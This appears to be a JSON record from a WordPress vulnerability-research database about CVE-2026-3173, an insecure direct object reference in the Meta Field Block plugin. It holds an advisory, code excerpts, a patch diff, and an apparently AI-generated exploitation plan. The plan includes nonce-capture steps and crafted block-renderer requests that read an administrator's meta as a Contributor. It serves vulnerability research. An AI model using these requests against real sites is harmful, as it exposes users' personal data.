[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_nyLJTu53ujMaQMtFYLRC1uLkQ3eITP0_F4SpGM9LW4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3173","meta-field-block-insecure-direct-object-reference-to-authenticated-contributor-arbitrary-user-meta-exposure","Meta Field Block \u003C= 1.5.1 - Insecure Direct Object Reference to Authenticated (Contributor+) Arbitrary User Meta Exposure","The Meta Field Block plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.5.1. This is due to the plugin allowing users to specify arbitrary object IDs and object types via block attributes without validating whether the authenticated user has permission to access the requested object's metadata. This makes it possible for authenticated attackers, with Contributor-level access and above, to read arbitrary user meta, post meta, and term meta data from any object in the database. On sites using plugins that store sensitive data in meta fields (e.g., WooCommerce billing\u002Fshipping information), this could lead to the exposure of Personally Identifiable Information (PII) including names, email addresses, phone numbers, and physical addresses.","display-a-meta-field-as-block",null,"\u003C=1.5.1","1.5.2","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-05-27 00:00:00","2026-05-28 05:30:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F247df9e2-0a63-49ad-86fa-cb4c6e62c4cf?source=api-prod",1,[22,23,24,25,26,27,28,29],"build\u002Findex.asset.php","build\u002Findex.js","build\u002Fsettings-rtl.css","build\u002Fsettings.asset.php","build\u002Fsettings.css","build\u002Fsettings.js","freemius.php","includes\u002Facf-fields.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3173 (Meta Field Block IDOR)\n\n## 1. Vulnerability Summary\nThe **Meta Field Block** plugin (versions \u003C= 1.5.1) contains an Insecure Direct Object Reference (IDOR) vulnerability. The plugin registers a Gutenberg block (`mfb\u002Fmeta-field-block`) that renders metadata from posts, terms, or users. The server-side rendering logic for this block accepts `objectId` and `objectType` as attributes but fails to perform capability checks to ensure the current user is authorized to view the metadata of the requested object. \n\nConsequently, any authenticated user with access to the block editor (Contributor level and above) can exploit the `block-renderer` REST API endpoint to retrieve sensitive metadata (PII, session info, or configuration) belonging to any user, post, or term by manipulating the block attributes.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fmfb\u002Fmeta-field-block`\n- **Method:** `GET` or `POST` (typically `GET` for the block renderer)\n- **Vulnerable Parameter:** `attributes` (specifically `objectId`, `objectType`, and `fieldName` within the JSON-encoded attributes).\n- **Authentication:** Required (Contributor+). Any user with `edit_posts` capability can access the Gutenberg editor and trigger the block renderer.\n- **Preconditions:** The attacker must have a valid login session as a Contributor or higher.\n\n## 3. Code Flow\n1. **Entry Point:** The block is registered with a `render_callback` (standard for dynamic blocks).\n2. **REST API Trigger:** In the Gutenberg editor, when a block is inserted or modified, the editor requests a preview from the WordPress REST API endpoint `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fmfb\u002Fmeta-field-block`.\n3. **Data Retrieval (Sink):**\n    - The plugin's rendering logic (likely in a class like `StandardFields` or `ACFFields`) extracts attributes from the request.\n    - `ACFFields::get_block_content` (in `includes\u002Facf-fields.php`) calls `get_field_value`.\n    - `ACFFields::get_object_id_with_type` (in `includes\u002Facf-fields.php`) processes the `object_id` and `object_type`.\n    - Functions like `get_user_meta($object_id, $field_name, true)` or `get_field_object()` (ACF) are called using the user-provided `object_id` and `object_type`.\n4. **Missing Check:** There is no call to `current_user_can( 'edit_user', $object_id )` or similar authorization checks before fetching and returning the meta value.\n\n## 4. Nonce Acquisition Strategy\nThe `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer` endpoint requires a valid REST API nonce (`_wpnonce`).\n\n1. **Create Page:** Create a dummy post\u002Fpage as the Contributor user to access the editor.\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_author=[CONTRIBUTOR_ID] --post_title=\"Exploit Page\"\n   ```\n2. **Navigate to Editor:** Use `browser_navigate` to open the edit screen for that post (e.g., `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=edit`).\n3. **Extract Nonce:** Use `browser_eval` to extract the REST nonce from the `wpApiSettings` object globally available in the admin dashboard.\n   ```javascript\n   \u002F\u002F JavaScript to run via browser_eval\n   window.wpApiSettings.nonce\n   ```\n4. **Identify Block Name:** Verifying from `build\u002Findex.js`, the block name is verbatim `mfb\u002Fmeta-field-block`.\n\n## 5. Exploitation Strategy\nThe goal is to read the `first_name` and `nickname` (and potentially WooCommerce PII if installed) of the Administrator (User ID 1).\n\n### Step-by-Step Plan:\n1. **Setup:** Create an Administrator and a Contributor. Add sensitive meta to the Administrator.\n2. **Authentication:** Log in to the WordPress dashboard as the Contributor.\n3. **Nonce Capture:** Navigate to a post editor page and capture the `_wpnonce`.\n4. **Request Payload:** Construct a request to the `block-renderer` endpoint.\n   - **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fmfb\u002Fmeta-field-block`\n   - **Query Params:**\n     - `context`: `edit`\n     - `attributes[fieldName]`: `first_name` (or any target meta key)\n     - `attributes[objectType]`: `user`\n     - `attributes[objectId]`: `1` (Admin ID)\n     - `_wpnonce`: `[CAPTURED_NONCE]`\n\n### Example HTTP Request (using `http_request` tool):\n```http\nGET \u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fmfb\u002Fmeta-field-block?context=edit&attributes%5BfieldName%5D=first_name&attributes%5BobjectType%5D=user&attributes%5BobjectId%5D=1&_wpnonce=[NONCE] HTTP\u002F1.1\nHost: localhost:8080\nCookie: [CONTRIBUTOR_COOKIES]\n```\n\n## 6. Test Data Setup\n1. **Target User:** Create an Administrator user (ID 1) and set a specific `first_name` and `nickname`.\n   ```bash\n   wp user create admin_victim victim@example.com --role=administrator --user_pass=password\n   wp user update 1 --first_name=\"TopSecretName\" --nickname=\"ShadowAdmin\"\n   ```\n2. **Attacker User:** Create a Contributor user.\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n3. **Sensitive Meta (Optional\u002FWooCommerce Simulation):**\n   ```bash\n   wp user meta update 1 billing_phone \"555-0199\"\n   wp user meta update 1 billing_address_1 \"123 Secure St\"\n   ```\n\n## 7. Expected Results\nThe REST API response will be a JSON object. The `rendered` property will contain the HTML markup of the block, which includes the raw value of the metadata.\n\n**Example Response:**\n```json\n{\n  \"rendered\": \"\u003Cdiv class=\\\"wp-block-mfb-meta-field-block mfb-meta-field-block\\\">TopSecretName\u003C\\\u002Fdiv>\"\n}\n```\nIf the attacker retrieves `TopSecretName`, the IDOR is confirmed.\n\n## 8. Verification Steps\n1. **Verify Value via CLI:** Check the actual database value to ensure the response matches.\n   ```bash\n   wp user meta get 1 first_name\n   ```\n2. **Check Response Content:** Ensure the `rendered` string in the JSON response contains the value `TopSecretName`.\n\n## 9. Alternative Approaches\n- **ACF Integration:** If Advanced Custom Fields is active, the payload can target ACF fields by adding `attributes[fieldType]=acf`.\n- **Term Meta:** Target term metadata by setting `attributes[objectType]=term` and `attributes[objectId]=[TERM_ID]`.\n- **Post Meta:** Target private post metadata by setting `attributes[objectType]=post` and `attributes[objectId]=[PRIVATE_POST_ID]`.\n- **POST Request:** Some environments may block long GET queries; the `block-renderer` also accepts `POST` with `attributes` in the body.\n  ```bash\n  # Alternative POST request body\n  action=post&attributes={\"fieldName\":\"first_name\",\"objectType\":\"user\",\"objectId\":1}&_wpnonce=[NONCE]\n  ```","The Meta Field Block plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) due to missing authorization checks in its block-rendering logic. Authenticated attackers with Contributor-level access or higher can manipulate block attributes to retrieve sensitive metadata—including PII and WooCommerce billing data—belonging to any user, post, or term via the REST API.","\u002F\u002F includes\u002Facf-fields.php:125\npublic function get_field_value( $field_name, $object_id, $object_type, $attributes, $block ) {\n    \u002F\u002F Get the id with object type.\n    $object_id_with_type = $this->get_object_id_with_type( $object_id, $object_type, $field_name );\n\n    $field_object = get_field_object( $field_name, $object_id_with_type, false, true );\n\n---\n\n\u002F\u002F includes\u002Facf-fields.php:196\npublic function get_object_id_with_type( $object_id, $object_type, $field_name ) {\n    if ( ! in_array( $object_type, [ 'post', 'term', 'user' ], true ) ) {\n        $object_id_with_type = $object_type;\n    } else {\n        $object_id_with_type = in_array( $object_type, [ 'term', 'user' ], true ) ? $object_type . '_' . $object_id : $object_id;\n    }\n\n    return $object_id_with_type;\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.0\u002Fbuild\u002Findex.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.2\u002Fbuild\u002Findex.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.0\u002Fbuild\u002Findex.asset.php\t2026-01-15 04:20:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.2\u002Fbuild\u002Findex.asset.php\t2026-03-02 01:35:20.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('lodash', 'react', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-url'), 'version' => '36cc2016b786f5649e4e');\n+\u003C?php return array('dependencies' => array('lodash', 'react', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-url'), 'version' => '29fad5dde1a6b9f7cddd');\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.0\u002Fbuild\u002Findex.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.2\u002Fbuild\u002Findex.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.0\u002Fbuild\u002Findex.js\t2026-01-15 04:20:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdisplay-a-meta-field-as-block\u002F1.5.2\u002Fbuild\u002Findex.js\t2026-03-02 01:35:20.000000000 +0000\n@@ -1 +1 @@\n-(()=>{\"use strict\";var e,t={437:(e,t,i)=>{const a=window.wp.blocks,n=window.wp.hooks;(0,n.addFilter)(\"blockEditor.useSetting.before\",\"MFB\u002FblockEditor.useSetting.before\",(e,t,i,a)=>\"mfb\u002Fmeta-field-block\"!==a?e:!![\"color.text\",\"color.background\",\"color.link\"].includes(t)||e); ... (truncated)","The exploit targets the WordPress block-renderer REST API endpoint, which is used to preview dynamic blocks. \n\n1. Authentication: The attacker logs in as a Contributor user, which provides the necessary permissions to access the block editor and the REST API.\n2. Nonce Acquisition: The attacker creates a draft post and inspects the global `wpApiSettings` object in the browser console to retrieve a valid REST API nonce (`_wpnonce`).\n3. Request Construction: The attacker sends a request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fmfb\u002Fmeta-field-block` using either GET or POST. \n4. Payload Manipulation: The attacker provides a target `objectId` (e.g., a User ID), `objectType` (e.g., 'user'), and the sensitive `fieldName` (e.g., 'billing_phone' or 'nickname') within the `attributes` parameter.\n5. Execution: Because the plugin lacks authorization checks (such as `current_user_can`) before fetching metadata for the specified ID, the REST API returns the value of the requested field inside the 'rendered' HTML string in the JSON response.","gemini-3-flash-preview","2026-06-04 17:52:11","2026-06-04 17:52:41",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.5.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdisplay-a-meta-field-as-block\u002Ftags\u002F1.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdisplay-a-meta-field-as-block.1.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdisplay-a-meta-field-as-block\u002Ftags\u002F1.5.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdisplay-a-meta-field-as-block.1.5.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdisplay-a-meta-field-as-block\u002Ftags"]